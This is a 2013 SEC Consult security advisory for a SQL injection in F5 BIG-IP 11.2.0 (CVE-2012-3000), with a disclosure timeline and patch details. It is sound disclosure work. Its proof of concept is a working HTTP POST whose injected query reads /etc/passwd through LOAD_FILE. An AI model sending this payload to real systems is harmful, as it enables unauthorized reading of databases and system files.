SEC Consult SA-20130122-1 :: F5 BIG-IP SQL injection vulnerability

From: SEC Consult Vulnerability Lab <>
To: bugtraq <>,
Subject: SEC Consult SA-20130122-1 :: F5 BIG-IP SQL injection vulnerability

SEC Consult Vulnerability Lab Security Advisory < 20130122-1 >
              title: SQL Injection
            product: F5 BIG-IP
 vulnerable version: <=11.2.0
      fixed version: 11.2.0 HF3
               11.2.1 HF3
         CVE number: CVE-2012-3000
             impact: Medium
              found: 2012-09-03
                 by: S. Viehböck
                     SEC Consult Vulnerability Lab

Vendor/product description:
"The BIG-IP product suite is a system of application delivery services that
work together on the same best-in-class hardware platform or software virtual
instance.  From load balancing and service offloading to acceleration and
security, the BIG-IP system delivers agility\u2014and ensures your applications
are fast, secure, and available."


Vulnerability overview/description:
A SQL injection vulnerability exists in a BIG-IP component. This enables an
authenticated attacker to access the MySQL database with the rights of MySQL
user "root" (= highest privileges).

Furthermore an attacker can access files in the file system with the rights of
the "mysql" OS user.

Proof of concept:
The following exploit shows how files can be extracted from the file system:

POST /sam/admin/reports/php/saveSettings.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 119

    "id": 2,
    "defaultQuery": "XX', ext1=(SELECT MID(LOAD_FILE('/etc/passwd'),0,60)) --
x" }

Note: target fields are only VARCHAR(60) thus MID() is used for extracting

A request to /sam/admin/reports/php/getSettings.php returns the data:

HTTP/1.1 200 OK


Vulnerable / tested versions:
The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0.

Successful exploitation was possible with Application Security (ASM) or Access
Policy (APM) enabled.

Vendor contact timeline:
2012-10-04: Sending advisory draft and proof of concept.
2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and 
            11.2.1 HF3.
2013-01-22: SEC Consult releases coordinated security advisory.

Update to 11.2.0 HF3 or 11.2.1 HF3.

No workaround available.

Advisory URL:

SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com

EOF S. Viehböck / @2013

Copyright © 1995-2018 All rights reserved.